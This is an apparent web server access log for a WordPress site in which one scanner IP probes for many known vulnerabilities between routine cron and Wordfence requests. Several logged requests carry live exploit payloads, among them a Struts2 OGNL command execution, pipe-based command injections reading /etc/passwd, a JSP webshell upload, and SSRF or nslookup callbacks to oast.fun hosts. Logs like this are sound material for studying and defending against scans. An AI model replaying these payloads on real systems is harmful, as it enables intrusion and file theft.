165.232.54.158 - - [13/Jan/2026:14:45:57 +0800] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:14:45:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768286759.2823390960693359375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:45:56 +0800] "POST /boardDataWW.php HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:45:59 +0800] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://d5iu610i9qj8svou82p0678bx6h96wj7f.oast.fun/jBePjZji.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:46:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768286775.6590659618377685546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:14:46:14 +0800] "POST /?wordfence_syncAttackData=1768286774.2319 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:46:12 +0800] "GET /wp-content/plugins/mainwp-vuln/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/118.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:48:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768286894.8888878822326660156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:48:11 +0800] "GET /?gf_page=upload HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:14:48:19 +0800] "POST /?gf_page=upload HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/129.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:49:21 +0800] "GET /?author=1 HTTP/1.1" 302 - "-" "-"
165.232.54.158 - - [13/Jan/2026:14:50:44 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (X11; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
165.232.54.158 - - [13/Jan/2026:14:50:48 +0800] "GET /wp-content/plugins/showbizpro/temp/update_extract/EOWWF.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:14:50:56 +0800] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://d5iu610i9qj8svou82p0758xf3pf3wbu5.oast.fun/5EMSFuO2EXj6YlUi.jpg HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:50:59 +0800] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/DWcxUN1nPLphdvsn.jpg HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
103.4.122.14 - - [13/Jan/2026:14:53:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768287200.1252288818359375000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:14:53:18 +0800] "POST /?wordfence_syncAttackData=1768287198.5826 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:53:16 +0800] "PUT /fileserver/38Btk6VHh2qe5JumeBMs7RkCH0o.txt HTTP/1.1" 404 10886 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:14:53:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768287205.9847218990325927734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:14:53:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:53:24 +0800] "GET /fileserver/38Btk6VHh2qe5JumeBMs7RkCH0o.txt HTTP/1.1" 404 10886 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:54:16 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:14:54:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768287258.5626149177551269531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:54:15 +0800] "GET /BSW_cxttongr.htm HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:56:44 +0800] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/113.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:56:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768287408.7383708953857421875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:56:45 +0800] "POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" 404 10879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:58:18 +0800] "GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:14:58:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768287503.6747519969940185546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:14:58:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768287503.6747519969940185546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:58:20 +0800] "POST /RPC2 HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:14:58:20 +0800] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:58:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768287509.3980441093444824218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:58:26 +0800] "GET /webadmin/script?command=|%20nslookup%20d5iu610i9qj8svou82p0qpg5yphpcncox.oast.fun HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Debian; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
165.232.54.158 - - [13/Jan/2026:15:01:37 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:15:01:39 +0800] "GET /__debugging_center_utils___.php?log=;echo%20mpeedlyvicshotlhfskqbaewdctjtdqp%20|%20id HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:01:40 +0800] "GET /wp-content/uploads/post_files/38btk94kouku0hzmbhbnbrithi3.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:01:43 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:15:01:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768287706.1640179157257080078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:01:44 +0800] "POST /?wordfence_syncAttackData=1768287704.557 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:01:42 +0800] "GET /__debugging_center_utils___.php?log=;echo%20mpeedlyvicshotlhfskqbaewdctjtdqp%20|%20ipconfig HTTP/1.1" 404 10883 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:01:47 +0800] "GET /wp-content/uploads/user_uploads/38btk94kouku0hzmbhbnbrithi3.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10"
103.4.122.14 - - [13/Jan/2026:15:03:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768287783.6724081039428710937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:03:00 +0800] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
103.4.122.14 - - [13/Jan/2026:15:03:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768287807.6025929450988769531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:03:24 +0800] "PUT /poc.jsp/ HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:15:03:30 +0800] "GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:15:03:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768287812.4091169834136962890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:03:29 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:15:03:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768287818.4914669990539550781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:03:35 +0800] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:15:03:37 +0800] "PUT /38Btk7zTU9wjAtvRZGYCOmgbNKR.jsp/ HTTP/1.1" 404 10888 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:03:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768287826.2641611099243164062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:03:43 +0800] "GET /38Btk7zTU9wjAtvRZGYCOmgbNKR.jsp HTTP/1.1" 404 10888 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
165.232.54.158 - - [13/Jan/2026:15:06:24 +0800] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 403 199 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:07:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768288024.7921309471130371093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:07:01 +0800] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1" 404 10877 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:07:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768288056.2984220981597900390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:07:32 +0800] "GET /util/xmlrpc/Handler.ashx HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:09:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768288152.6687550544738769531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:09:09 +0800] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:09:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768288159.2423269748687744140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:09:16 +0800] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:15:09:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768288165.2146480083465576171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:09:22 +0800] "POST /invoker/readonly HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:15:09:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768288172.1729331016540527343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:09:29 +0800] "GET /KaseyaCwWebService/ManagedIT.asmx HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:15:09:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768288178.2037150859832763671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:09:35 +0800] "POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1" 404 10876 "-" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:15:10:21 +0800] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:15:12:33 +0800] "POST / HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:15:12:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768288361.1702790260314941406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:12:39 +0800] "POST /?wordfence_syncAttackData=1768288359.5434 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:12:37 +0800] "GET /38Btk4qe0mo9BSwRnFk2n0bYnzS.php%5Cx0A HTTP/1.1" 404 10894 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:15:16:08 +0800] "POST /clients/editclient.php?id=38Btjz6jTPa6IMWgnsZhwWGSsRS&action=update HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:16:16 +0800] "POST /wp-cron.php?doing_wp_cron=1768288576.2116079330444335937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:16:14 +0800] "POST /?wordfence_syncAttackData=1768288574.5898 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:16:12 +0800] "GET /logos_clients/38Btjz6jTPa6IMWgnsZhwWGSsRS.php HTTP/1.1" 404 10886 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:16:17 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:15:16:24 +0800] "POST /wp-cron.php?doing_wp_cron=1768288584.4047970771789550781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:16:21 +0800] "GET /hw-sys.htm HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:15:16:28 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:15:18:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768288697.7548620700836181640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:18:14 +0800] "POST /integration/saveGangster.action HTTP/1.1" 404 10953 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
165.232.54.158 - - [13/Jan/2026:15:19:55 +0800] "GET /__ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:15:20:52 +0800] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:20:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768288856.8094370365142822265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:20:53 +0800] "POST /cobbler_api HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:15:22:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768288941.7062120437622070312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:22:18 +0800] "GET /secure/Dashboard.jspa HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:15:22:25 +0800] "POST /nagiosql/admin/logbook.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:22:26 +0800] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
103.4.122.14 - - [13/Jan/2026:15:22:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768288948.8664169311523437500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:22:27 +0800] "POST /?wordfence_syncAttackData=1768288947.3404 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:22:25 +0800] "GET /jira/secure/Dashboard.jspa HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:22:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768288956.3280379772186279296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:22:33 +0800] "GET /login.jsp HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:15:24:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768289079.7189409732818603515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:24:36 +0800] "POST /struts2-rest-showcase/orders/3 HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
103.4.122.14 - - [13/Jan/2026:15:24:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768289087.4376409053802490234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:24:44 +0800] "POST /orders/3 HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:26:06 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:26:33 +0800] "POST /modules/attributewizardpro/file_upload.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:27:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768289273.3322150707244873046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:15:27:51 +0800] "POST /?wordfence_syncAttackData=1768289271.6801 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:27:48 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:27:52 +0800] "POST /system/sharedir.php HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:28:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768289280.3610138893127441406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:27:57 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:100.0esr) Gecko/20012409 Firefox/100.0esr"
165.232.54.158 - - [13/Jan/2026:15:27:58 +0800] "POST /en/php/usb_sync.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:15:32:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768289534.1753470897674560546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:32:10 +0800] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:33:42 +0800] "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:15:33:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768289627.7404100894927978515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:33:44 +0800] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 10859 "https://nutritaste.com.au" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
165.232.54.158 - - [13/Jan/2026:15:33:46 +0800] "POST /avi/avigui/avigwt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:35:03 +0800] "POST /pandora_console/ajax.php?page=include/ajax/update_manager.ajax&upload_file=true HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:15:35:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768289708.7324628829956054687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:15:35:05 +0800] "POST /filemanager/upload.php HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:15:35:07 +0800] "PUT /meta HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
